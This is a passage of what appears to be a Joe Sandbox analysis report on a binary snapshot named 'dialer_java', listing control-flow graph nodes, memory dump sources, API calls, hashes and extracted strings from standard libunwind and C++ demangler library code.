7ff6e3a76940 1079->1088 1081->1069 1082->1041 1083->1074 1091 7ff6e3a765da 1083->1091 1084->1075 1092 7ff6e3a76c86-7ff6e3a76ccf _assert call 7ff6e3a780f0 call 7ff6e3a63f50 1085->1092 1093 7ff6e3a767fc-7ff6e3a76844 1086->1093 1094 7ff6e3a767d2-7ff6e3a767df malloc 1086->1094 1095 7ff6e3a76942-7ff6e3a76956 memchr 1087->1095 1088->1095 1097 7ff6e3a76a16-7ff6e3a76a1f 1089->1097 1098 7ff6e3a76a25-7ff6e3a76a2b 1089->1098 1090->1092 1096 7ff6e3a769fb-7ff6e3a769ff 1090->1096 1091->1043 1093->1043 1094->1071 1100 7ff6e3a767e5-7ff6e3a767f9 1094->1100 1095->1059 1101 7ff6e3a76958-7ff6e3a7695f 1095->1101 1096->1089 1097->1098 1102 7ff6e3a76af1 1097->1102 1103 7ff6e3a76a30-7ff6e3a76a3e call 7ff6e3a6ba60 1098->1103 1100->1093 1101->1059 1106 7ff6e3a76961-7ff6e3a7696f call 7ff6e3a77b80 1101->1106 1107 7ff6e3a76af5-7ff6e3a76b15 call 7ff6e3a6d9a0 1102->1107 1114 7ff6e3a76a44-7ff6e3a76a4c 1103->1114 1115 7ff6e3a76c13-7ff6e3a76c35 1103->1115 1106->1115 1117 7ff6e3a76975-7ff6e3a7697d 1106->1117 1118 7ff6e3a76b17-7ff6e3a76b23 1107->1118 1119 7ff6e3a76b51 1107->1119 1121 7ff6e3a76acb-7ff6e3a76add 1114->1121 1122 7ff6e3a76a4e-7ff6e3a76a5f 1114->1122 1115->1085 1120 7ff6e3a76c37-7ff6e3a76c4f 1115->1120 1124 7ff6e3a76909-7ff6e3a7691f 1117->1124 1125 7ff6e3a7697f-7ff6e3a76990 1117->1125 1126 7ff6e3a76b54-7ff6e3a76b57 1118->1126 1127 7ff6e3a76b25-7ff6e3a76b28 1118->1127 1119->1126 1128 7ff6e3a76c56-7ff6e3a76c62 1120->1128 1129 7ff6e3a76c51 free 1120->1129 1121->1103 1132 7ff6e3a76ae3-7ff6e3a76ae6 1121->1132 1130 7ff6e3a76a77-7ff6e3a76a82 malloc 1122->1130 1131 7ff6e3a76a61-7ff6e3a76a70 realloc 1122->1131 1124->1059 1124->1066 1133 7ff6e3a768cb-7ff6e3a768da realloc 1125->1133 1134 7ff6e3a76996-7ff6e3a769a1 malloc 1125->1134 1139 7ff6e3a76b59-7ff6e3a76b5c 1126->1139 1135 7ff6e3a76b30-7ff6e3a76b39 1127->1135 1128->1043 1129->1128 1130->1071 1138 7ff6e3a76a88-7ff6e3a76a8e 1130->1138 1136 7ff6e3a76aa2-7ff6e3a76ac7 1131->1136 1137 7ff6e3a76a72 1131->1137 1132->1103 1140 7ff6e3a76aec-7ff6e3a76aef 1132->1140 1133->1071 1144 7ff6e3a768e0-7ff6e3a76905 1133->1144 1134->1071 1141 7ff6e3a769a7-7ff6e3a769ad 1134->1141 1142 7ff6e3a76b3b-7ff6e3a76b44 1135->1142 1143 7ff6e3a76b49-7ff6e3a76b4f 1135->1143 1136->1121 1137->1071 1145 7ff6e3a76a90-7ff6e3a76a99 memcpy 1138->1145 1146 7ff6e3a76a9e 1138->1146 1147 7ff6e3a76b62-7ff6e3a76b65 1139->1147 1148 7ff6e3a76c11 1139->1148 1140->1107 1149 7ff6e3a769bd-7ff6e3a769c1 1141->1149 1150 7ff6e3a769af-7ff6e3a769b8 memcpy 1141->1150 1142->1135 1151 7ff6e3a76b46 1142->1151 1143->1139 1144->1124 1145->1146 1146->1136 1147->1148 1152 7ff6e3a76b6b-7ff6e3a76b89 1147->1152 1148->1115 1149->1144 1150->1149 1151->1143 1153 7ff6e3a76b8b-7ff6e3a76b98 malloc 1152->1153 1154 7ff6e3a76bb5-7ff6e3a76c0f 1152->1154 1153->1071 1155 7ff6e3a76b9e-7ff6e3a76bb2 1153->1155 1154->1115 1155->1154
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc$_assert$freememchr
                                      • String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
                                      • API String ID: 3787261664-3461159648
                                      • Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction ID: 2eabe8cce145a44d6fca95da0e5c3f4bf4efa98aff464b751c449cb0ed1dcccc
                                      • Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction Fuzzy Hash: 3622B233709B8281EA248F29E4853BA7BA4FB45B84F054235DA9D577E9EF3DE481C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$strlen
                                      • String ID: objcprot
                                      • API String ID: 832207080-2390413308
                                      • Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction ID: cf63f71301cc327ab38e5b634ad9f01554a151dd3665b5ad329f0fad37ecd153
                                      • Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction Fuzzy Hash: 8B02F333709B8181EB258B28E4857A97BA4EB04B94F454331DFAC573D9DF39E5A2C309
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction ID: b7c4e55b2dbc41e49bac922fe71889640647f26a64f3ca18c2d94b6fd24e2bda
                                      • Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction Fuzzy Hash: 6D22E233709B8185EB258B18E0893AD3BA8FB44B80F584239DB9D573D5DF39E592C319

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1156 7ff6e3a64120-7ff6e3a64159 call 7ff6e3a68350 call 7ff6e3a687f0 1161 7ff6e3a64413-7ff6e3a6441a call 7ff6e3a68a70 1156->1161 1162 7ff6e3a6415f-7ff6e3a64173 1156->1162 1168 7ff6e3a6444d-7ff6e3a64467 1161->1168 1169 7ff6e3a6441c-7ff6e3a64448 call 7ff6e3a63d60 fflush 1161->1169 1163 7ff6e3a64198-7ff6e3a641ae call 7ff6e3a68880 call 7ff6e3a68a70 1162->1163 1174 7ff6e3a6437a-7ff6e3a6437c 1163->1174 1175 7ff6e3a641b4-7ff6e3a641b6 1163->1175 1171 7ff6e3a64470-7ff6e3a64484 1168->1171 1169->1168 1174->1171 1177 7ff6e3a64382-7ff6e3a64394 1174->1177 1178 7ff6e3a641b8-7ff6e3a641d0 call 7ff6e3a689b0 1175->1178 1179 7ff6e3a64232-7ff6e3a6425f call 7ff6e3a68a70 1175->1179 1187 7ff6e3a643b5-7ff6e3a643bb call 7ff6e3a63d60 1177->1187 1188 7ff6e3a641e6 1178->1188 1189 7ff6e3a641d2-7ff6e3a641e4 1178->1189 1193 7ff6e3a6428c-7ff6e3a6428f 1179->1193 1194 7ff6e3a64261-7ff6e3a64287 call 7ff6e3a63d60 fflush 1179->1194 1196 7ff6e3a643c0-7ff6e3a643d3 fflush 1187->1196 1191 7ff6e3a641ed-7ff6e3a641f4 call 7ff6e3a68a70 1188->1191 1189->1188 1189->1191 1191->1179 1202 7ff6e3a641f6-7ff6e3a6422d call 7ff6e3a63d60 fflush 1191->1202 1198 7ff6e3a64396-7ff6e3a6439d call 7ff6e3a68a70 1193->1198 1199 7ff6e3a64295-7ff6e3a6429d 1193->1199 1194->1193 1196->1171 1198->1171 1211 7ff6e3a643a3-7ff6e3a643ae 1198->1211 1203 7ff6e3a64188-7ff6e3a64192 call 7ff6e3a687f0 1199->1203 1204 7ff6e3a642a3-7ff6e3a642aa call 7ff6e3a68a70 1199->1204 1202->1179 1203->1161 1203->1163 1215 7ff6e3a642ac-7ff6e3a642d2 call 7ff6e3a63d60 fflush 1204->1215 1216 7ff6e3a642d7-7ff6e3a642f8 1204->1216 1211->1187 1215->1216 1224 7ff6e3a642fa-7ff6e3a64300 1216->1224 1225 7ff6e3a64340-7ff6e3a64347 call 7ff6e3a68a70 1216->1225 1229 7ff6e3a64306-7ff6e3a6430d call 7ff6e3a68a70 1224->1229 1230 7ff6e3a643d8-7ff6e3a643dc 1224->1230 1238 7ff6e3a6434d-7ff6e3a64375 call 7ff6e3a63d60 fflush 1225->1238 1239 7ff6e3a64180-7ff6e3a64183 call 7ff6e3a68920 1225->1239 1229->1203 1244 7ff6e3a64313-7ff6e3a6433b call 7ff6e3a63d60 fflush 1229->1244 1231 7ff6e3a643e2-7ff6e3a643e9 call 7ff6e3a68a70 1230->1231 1232 7ff6e3a64485-7ff6e3a6448c call 7ff6e3a68a70 1230->1232 1231->1161 1245 7ff6e3a643eb-7ff6e3a6440e call 7ff6e3a63d60 fflush 1231->1245 1232->1171 1246 7ff6e3a6448e-7ff6e3a644ae call 7ff6e3a63d60 1232->1246 1238->1239 1239->1203 1244->1203 1245->1161 1246->1196
                                      APIs
                                      Strings
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6E3A6442B
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6E3A643F2
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6E3A64214
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6E3A6431D
                                      • .anonymous., xrefs: 00007FF6E3A641E6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6E3A64499
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6E3A642B6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6E3A64357
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6E3A643AE
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6E3A6438D
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6E3A6426B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush$CaptureContextgetenv
                                      • String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
                                      • API String ID: 3501801798-3031193476
                                      • Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction ID: afc2d264f852b62f6b0b3e01289ffe330833388af6764c87bee00310b474df28
                                      • Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction Fuzzy Hash: 7081B212B1D24241FA14A76EA80B3B96B59AF52BC4F400039DE4EB73C3DE2FE581424F
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocmemcpy
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 4276657696-3503049562
                                      • Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction ID: 4bdc5bf315088304cef6b9371002479283016a7ed2b4b11b7b4f51d233f192c3
                                      • Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
                                      • Instruction Fuzzy Hash: 95718F33719B8282EA61DB19F4823BA6BA4FB44780F444035DB8D97B95EF3DE084C349
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fputwcfwprintf
                                      • String ID: %*.*s$%-*.*s$%.*s$%s
                                      • API String ID: 3232229890-407542676
                                      • Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction ID: bd9ed510e85daab7e04dbc231cf832698fc643839c1db50cafdb71b0d85a4fee
                                      • Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
                                      • Instruction Fuzzy Hash: 0E5155B3F2450287E7788E1EE45273A7BA1EB44750B114139DB9ED76A1DE3EE8808B05
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$_assertmemcpy
                                      • String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
                                      • API String ID: 2140428464-3850676658
                                      • Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction ID: d4c69ff5f3f1f37a41718a411e10b2fbe7049ed4090cd19d5a9a510bad1e9f8c
                                      • Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
                                      • Instruction Fuzzy Hash: D441D2B3B06B8282DE28CF4AE4863B967A5EB54BC4F048531CB9E57795EF3DD0818301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 948496778-4167058683
                                      • Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction ID: 02ac2b0f4d4df6a05bb346250d64fbddae422c0fe589f830a1e4b38dfe606d9b
                                      • Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
                                      • Instruction Fuzzy Hash: 5461E2A3B06B8681DB148B19E4897BD7BA0EB04B84F448232DB5D977D4DF3DE192C349
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID: or<char>
                                      • API String ID: 1833655766-3520798227
                                      • Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction ID: df57e3db1fa30eb5ad5b7f6cf5b8fe84a861f3cf47c20babcd8bdf6fd1534fd6
                                      • Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
                                      • Instruction Fuzzy Hash: 1C5182B3A06B8682DE258F59E5953A9B761EB95BC4F00C132CB8E57795EF3CE180C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction ID: 13f0120b8d0f7e153cea7db1bc62a8f1633d30df72c7be8ed8828c2fea5aa33e
                                      • Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction Fuzzy Hash: 5D4164B3B05B8582DA28CF49E4857697761EB94BC4F008431DB9E577A4EF3DE481C345
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 1222420520-1046023109
                                      • Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction ID: 45a64119237c5711a2e94320893ddd6db761c6ce84c6cf11e1230f7856c09c02
                                      • Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction Fuzzy Hash: CEF0B4B7B06B5281E6648F0CE482B287BA0EB54B60F508230C52CA2AD0DE2F9192C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: [enable$_if:
                                      • API String ID: 471065373-3342140569
                                      • Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction ID: e86d9378ed1dd36926dc6857ffd77f6d3a0413dcba4eb950e341d58004d9b350
                                      • Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction Fuzzy Hash: 47114CF3B06B8682DA189F0AF85536DA765EB54BC0F50C531CB4E577A5EE3DE4818304
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: false$true
                                      • API String ID: 2500458235-2658103896
                                      • Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
                                      • Instruction ID: 3384f904c1888d6774cb34d4cee90b93cdcd6abd650d870a3b33c998015895be
                                      • Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
